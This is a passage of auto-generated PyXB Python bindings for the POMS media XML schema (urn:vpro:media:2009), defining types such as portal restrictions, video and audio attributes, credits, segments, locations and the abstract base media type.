program = property(__program.value, __program.set, None, '\n This is the most used entity in POMS. It represents e.g. one broadcast program or one web-only clip. It represent a standalone entity which a consumer can view or listen to.\n ')
_ElementMap.update({
__program.name() : __program
})
_AttributeMap.update({
})
_module_typeBindings.programTableType = programTableType
Namespace.addCategoryObject('typeBinding', 'programTableType', programTableType)
# Complex type {urn:vpro:media:2009}portalRestrictionType with content type SIMPLE
class portalRestrictionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}portalRestrictionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'portalRestrictionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 330, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute start uses Python identifier start
__start = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'start'), 'start', '__urnvpromedia2009_portalRestrictionType_start', pyxb.binding.datatypes.dateTime)
__start._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
__start._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
start = property(__start.value, __start.set, None, None)
# Attribute stop uses Python identifier stop
__stop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'stop'), 'stop', '__urnvpromedia2009_portalRestrictionType_stop', pyxb.binding.datatypes.dateTime)
__stop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
__stop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
stop = property(__stop.value, __stop.set, None, None)
# Attribute portalId uses Python identifier portalId
__portalId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'portalId'), 'portalId', '__urnvpromedia2009_portalRestrictionType_portalId', pyxb.binding.datatypes.string)
__portalId._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 333, 8)
__portalId._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 333, 8)
portalId = property(__portalId.value, __portalId.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__start.name() : __start,
__stop.name() : __stop,
__portalId.name() : __portalId
})
_module_typeBindings.portalRestrictionType = portalRestrictionType
Namespace.addCategoryObject('typeBinding', 'portalRestrictionType', portalRestrictionType)
# Complex type {urn:vpro:media:2009}tagType with content type SIMPLE
class tagType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}tagType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'tagType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 372, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute {http://www.w3.org/XML/1998/namespace}lang uses Python identifier lang
__lang = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'lang'), 'lang', '__urnvpromedia2009_tagType_httpwww_w3_orgXML1998namespacelang', pyxb.binding.xml_.STD_ANON_lang)
__lang._DeclarationLocation = None
__lang._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 375, 8)
lang = property(__lang.value, __lang.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__lang.name() : __lang
})
_module_typeBindings.tagType = tagType
Namespace.addCategoryObject('typeBinding', 'tagType', tagType)
# Complex type {urn:vpro:media:2009}portalsType with content type ELEMENT_ONLY
class portalsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}portalsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'portalsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 455, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}portal uses Python identifier portal
__portal = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'portal'), 'portal', '__urnvpromedia2009_portalsType_urnvpromedia2009portal', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6), )
portal = property(__portal.value, __portal.set, None, None)
_ElementMap.update({
__portal.name() : __portal
})
_AttributeMap.update({
})
_module_typeBindings.portalsType = portalsType
Namespace.addCategoryObject('typeBinding', 'portalsType', portalsType)
# Complex type {urn:vpro:media:2009}repeatType with content type SIMPLE
class repeatType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}repeatType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'repeatType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 461, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute isRerun uses Python identifier isRerun
__isRerun = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isRerun'), 'isRerun', '__urnvpromedia2009_repeatType_isRerun', pyxb.binding.datatypes.boolean, required=True)
__isRerun._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 464, 8)
__isRerun._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 464, 8)
isRerun = property(__isRerun.value, __isRerun.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__isRerun.name() : __isRerun
})
_module_typeBindings.repeatType = repeatType
Namespace.addCategoryObject('typeBinding', 'repeatType', repeatType)
# Complex type {urn:vpro:media:2009}avAttributesType with content type ELEMENT_ONLY
class avAttributesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}avAttributesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'avAttributesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 469, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}bitrate uses Python identifier bitrate
__bitrate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'bitrate'), 'bitrate', '__urnvpromedia2009_avAttributesType_urnvpromedia2009bitrate', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6), )
bitrate = property(__bitrate.value, __bitrate.set, None, None)
# Element {urn:vpro:media:2009}byteSize uses Python identifier byteSize
__byteSize = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'byteSize'), 'byteSize', '__urnvpromedia2009_avAttributesType_urnvpromedia2009byteSize', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6), )
byteSize = property(__byteSize.value, __byteSize.set, None, None)
# Element {urn:vpro:media:2009}avFileFormat uses Python identifier avFileFormat
__avFileFormat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avFileFormat'), 'avFileFormat', '__urnvpromedia2009_avAttributesType_urnvpromedia2009avFileFormat', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6), )
avFileFormat = property(__avFileFormat.value, __avFileFormat.set, None, None)
# Element {urn:vpro:media:2009}videoAttributes uses Python identifier videoAttributes
__videoAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'videoAttributes'), 'videoAttributes', '__urnvpromedia2009_avAttributesType_urnvpromedia2009videoAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6), )
videoAttributes = property(__videoAttributes.value, __videoAttributes.set, None, None)
# Element {urn:vpro:media:2009}audioAttributes uses Python identifier audioAttributes
__audioAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'audioAttributes'), 'audioAttributes', '__urnvpromedia2009_avAttributesType_urnvpromedia2009audioAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6), )
audioAttributes = property(__audioAttributes.value, __audioAttributes.set, None, None)
_ElementMap.update({
__bitrate.name() : __bitrate,
__byteSize.name() : __byteSize,
__avFileFormat.name() : __avFileFormat,
__videoAttributes.name() : __videoAttributes,
__audioAttributes.name() : __audioAttributes
})
_AttributeMap.update({
})
_module_typeBindings.avAttributesType = avAttributesType
Namespace.addCategoryObject('typeBinding', 'avAttributesType', avAttributesType)
# Complex type {urn:vpro:media:2009}videoAttributesType with content type ELEMENT_ONLY
class videoAttributesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}videoAttributesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'videoAttributesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 501, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}color uses Python identifier color
__color = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'color'), 'color', '__urnvpromedia2009_videoAttributesType_urnvpromedia2009color', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6), )
color = property(__color.value, __color.set, None, None)
# Element {urn:vpro:media:2009}videoCoding uses Python identifier videoCoding
__videoCoding = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'videoCoding'), 'videoCoding', '__urnvpromedia2009_videoAttributesType_urnvpromedia2009videoCoding', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6), )
videoCoding = property(__videoCoding.value, __videoCoding.set, None, None)
# Element {urn:vpro:media:2009}aspectRatio uses Python identifier aspectRatio
__aspectRatio = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'aspectRatio'), 'aspectRatio', '__urnvpromedia2009_videoAttributesType_urnvpromedia2009aspectRatio', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6), )
aspectRatio = property(__aspectRatio.value, __aspectRatio.set, None, None)
# Attribute height uses Python identifier height
__height = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'height'), 'height', '__urnvpromedia2009_videoAttributesType_height', pyxb.binding.datatypes.short)
__height._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 507, 4)
__height._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 507, 4)
height = property(__height.value, __height.set, None, None)
# Attribute heigth uses Python identifier heigth
__heigth = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'heigth'), 'heigth', '__urnvpromedia2009_videoAttributesType_heigth', pyxb.binding.datatypes.short)
__heigth._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 508, 4)
__heigth._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 508, 4)
heigth = property(__heigth.value, __heigth.set, None, '\n This obviously is a typo.\n ')
# Attribute width uses Python identifier width
__width = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'width'), 'width', '__urnvpromedia2009_videoAttributesType_width', pyxb.binding.datatypes.short)
__width._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 515, 4)
__width._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 515, 4)
width = property(__width.value, __width.set, None, None)
_ElementMap.update({
__color.name() : __color,
__videoCoding.name() : __videoCoding,
__aspectRatio.name() : __aspectRatio
})
_AttributeMap.update({
__height.name() : __height,
__heigth.name() : __heigth,
__width.name() : __width
})
_module_typeBindings.videoAttributesType = videoAttributesType
Namespace.addCategoryObject('typeBinding', 'videoAttributesType', videoAttributesType)
# Complex type {urn:vpro:media:2009}audioAttributesType with content type ELEMENT_ONLY
class audioAttributesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}audioAttributesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'audioAttributesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 534, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}numberOfChannels uses Python identifier numberOfChannels
__numberOfChannels = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'numberOfChannels'), 'numberOfChannels', '__urnvpromedia2009_audioAttributesType_urnvpromedia2009numberOfChannels', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6), )
numberOfChannels = property(__numberOfChannels.value, __numberOfChannels.set, None, None)
# Element {urn:vpro:media:2009}audioCoding uses Python identifier audioCoding
__audioCoding = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'audioCoding'), 'audioCoding', '__urnvpromedia2009_audioAttributesType_urnvpromedia2009audioCoding', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6), )
audioCoding = property(__audioCoding.value, __audioCoding.set, None, None)
# Element {urn:vpro:media:2009}language uses Python identifier language
__language = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'language'), 'language', '__urnvpromedia2009_audioAttributesType_urnvpromedia2009language', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6), )
language = property(__language.value, __language.set, None, None)
_ElementMap.update({
__numberOfChannels.name() : __numberOfChannels,
__audioCoding.name() : __audioCoding,
__language.name() : __language
})
_AttributeMap.update({
})
_module_typeBindings.audioAttributesType = audioAttributesType
Namespace.addCategoryObject('typeBinding', 'audioAttributesType', audioAttributesType)
# Complex type {urn:vpro:media:2009}creditsType with content type ELEMENT_ONLY
class creditsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}creditsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'creditsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 542, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}person uses Python identifier person
__person = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'person'), 'person', '__urnvpromedia2009_creditsType_urnvpromedia2009person', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 545, 8), )
person = property(__person.value, __person.set, None, None)
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_creditsType_urnvpromedia2009name', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 546, 8), )
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
__person.name() : __person,
__name.name() : __name
})
_AttributeMap.update({
})
_module_typeBindings.creditsType = creditsType
Namespace.addCategoryObject('typeBinding', 'creditsType', creditsType)
# Complex type {urn:vpro:media:2009}segmentsType with content type ELEMENT_ONLY
class segmentsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}segmentsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'segmentsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 623, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}segment uses Python identifier segment
__segment = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segment'), 'segment', '__urnvpromedia2009_segmentsType_urnvpromedia2009segment', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6), )
segment = property(__segment.value, __segment.set, None, None)
_ElementMap.update({
__segment.name() : __segment
})
_AttributeMap.update({
})
_module_typeBindings.segmentsType = segmentsType
Namespace.addCategoryObject('typeBinding', 'segmentsType', segmentsType)
# Complex type {urn:vpro:media:2009}imagesType with content type ELEMENT_ONLY
class imagesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}imagesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'imagesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 655, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:shared:2009}image uses Python identifier image
__image = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_shared, 'image'), 'image', '__urnvpromedia2009_imagesType_urnvproshared2009image', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproShared.xsd', 8, 2), )
image = property(__image.value, __image.set, None, None)
_ElementMap.update({
__image.name() : __image
})
_AttributeMap.update({
})
_module_typeBindings.imagesType = imagesType
Namespace.addCategoryObject('typeBinding', 'imagesType', imagesType)
# Complex type {urn:vpro:media:2009}groupTableType with content type ELEMENT_ONLY
class groupTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}groupTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'groupTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 674, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}group uses Python identifier group
__group = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'group'), 'group', '__urnvpromedia2009_groupTableType_urnvpromedia2009group', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 32, 2), )
group = property(__group.value, __group.set, None, '\n A groups collects a number of programs and/or other groups. Examples: season, series, playlist and album.\n ')
_ElementMap.update({
__group.name() : __group
})
_AttributeMap.update({
})
_module_typeBindings.groupTableType = groupTableType
Namespace.addCategoryObject('typeBinding', 'groupTableType', groupTableType)
# Complex type {urn:vpro:media:2009}locationTableType with content type ELEMENT_ONLY
class locationTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}locationTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 704, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}location uses Python identifier location
__location = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'location'), 'location', '__urnvpromedia2009_locationTableType_urnvpromedia2009location', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 706, 6), )
location = property(__location.value, __location.set, None, None)
# Element {urn:vpro:media:2009}scheduleEvent uses Python identifier scheduleEvent
__scheduleEvent = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), 'scheduleEvent', '__urnvpromedia2009_locationTableType_urnvpromedia2009scheduleEvent', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 707, 6), )
scheduleEvent = property(__scheduleEvent.value, __scheduleEvent.set, None, None)
_ElementMap.update({
__location.name() : __location,
__scheduleEvent.name() : __scheduleEvent
})
_AttributeMap.update({
})
_module_typeBindings.locationTableType = locationTableType
Namespace.addCategoryObject('typeBinding', 'locationTableType', locationTableType)
# Complex type {urn:vpro:media:2009}scheduleEventsType with content type ELEMENT_ONLY
class scheduleEventsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 724, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}scheduleEvent uses Python identifier scheduleEvent
__scheduleEvent = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), 'scheduleEvent', '__urnvpromedia2009_scheduleEventsType_urnvpromedia2009scheduleEvent', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 726, 6), )
scheduleEvent = property(__scheduleEvent.value, __scheduleEvent.set, None, None)
_ElementMap.update({
__scheduleEvent.name() : __scheduleEvent
})
_AttributeMap.update({
})
_module_typeBindings.scheduleEventsType = scheduleEventsType
Namespace.addCategoryObject('typeBinding', 'scheduleEventsType', scheduleEventsType)
# Complex type {urn:vpro:media:2009}locationsType with content type ELEMENT_ONLY
class locationsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}locationsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 803, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}location uses Python identifier location
__location = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'location'), 'location', '__urnvpromedia2009_locationsType_urnvpromedia2009location', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 805, 6), )
location = property(__location.value, __location.set, None, None)
_ElementMap.update({
__location.name() : __location
})
_AttributeMap.update({
})
_module_typeBindings.locationsType = locationsType
Namespace.addCategoryObject('typeBinding', 'locationsType', locationsType)
# Complex type {urn:vpro:media:2009}availableSubtitleType with content type EMPTY
class availableSubtitleType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}availableSubtitleType with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'availableSubtitleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 831, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute language uses Python identifier language
__language = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'language'), 'language', '__urnvpromedia2009_availableSubtitleType_language', pyxb.binding.datatypes.string)
__language._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 833, 4)
__language._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 833, 4)
language = property(__language.value, __language.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_availableSubtitleType_type', pyxb.binding.datatypes.string)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 834, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 834, 4)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__language.name() : __language,
__type.name() : __type
})
_module_typeBindings.availableSubtitleType = availableSubtitleType
Namespace.addCategoryObject('typeBinding', 'availableSubtitleType', availableSubtitleType)
# Complex type {urn:vpro:media:2009}baseMediaType with content type ELEMENT_ONLY
class baseMediaType (pyxb.binding.basis.complexTypeDefinition):
"""
This is the abstract base entity for programs, groups and segments. Actually these objects are very similar and share most properties.
"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'baseMediaType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 218, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}crid uses Python identifier crid
__crid = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'crid'), 'crid', '__urnvpromedia2009_baseMediaType_urnvpromedia2009crid', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6), )
crid = property(__crid.value, __crid.set, None, '\n A crid (content reference identifier) is a reference to an entity in another system. E.g. a crid like\n crid://broadcast.radiobox2/335793 refers to a broadcast with id 335793 in Radiobox. A crid must be a valid\n URI starting with "crid://". Crids must be unique, but they can be made up freely. It is a good idea to use\n a logical structure which can easily be associated with another system. Any POMS object can have zero or\n more crids. They can refer to different systems, but a POMS object could also actually represent more than\n one entity in a remote system.\n ')
# Element {urn:vpro:media:2009}broadcaster uses Python identifier broadcaster
__broadcaster = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'broadcaster'), 'broadcaster', '__urnvpromedia2009_baseMediaType_urnvpromedia2009broadcaster', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6), )
broadcaster = property(__broadcaster.value, __broadcaster.set, None, '\n One or more broadcasters can be the owner of a POMS media object. This information is meta information about the object, but it is also used\n for assigning write access to the object in the POMS backend to employees of these given broadcasting companies.\n ')
# Element {urn:vpro:media:2009}portal uses Python identifier portal
__portal = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'portal'), 'portal', '__urnvpromedia2009_baseMediaType_urnvpromedia2009portal', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6), )
portal = property(__portal.value, __portal.set, None, "\n Optionally 'portals' can be assigned to a media object. Portals are also 'owners', and employees can also work for a certain portal.\n This is because some portal are shared by several broadcasting companies.\n ")
# Element {urn:vpro:media:2009}exclusive uses Python identifier exclusive
__exclusive = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'exclusive'), 'exclusive', '__urnvpromedia2009_baseMediaType_urnvpromedia2009exclusive', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6), )
exclusive = property(__exclusive.value, __exclusive.set, None, "\n Besides having portals, which mainly indicates where the object originates, a media object can also be assigned 'portal restrictions'.\n If a media object has any portal restrictions the media object may only be shown on these portals.\n ")
# Element {urn:vpro:media:2009}region uses Python identifier region
__region = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'region'), 'region', '__urnvpromedia2009_baseMediaType_urnvpromedia2009region', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6), )
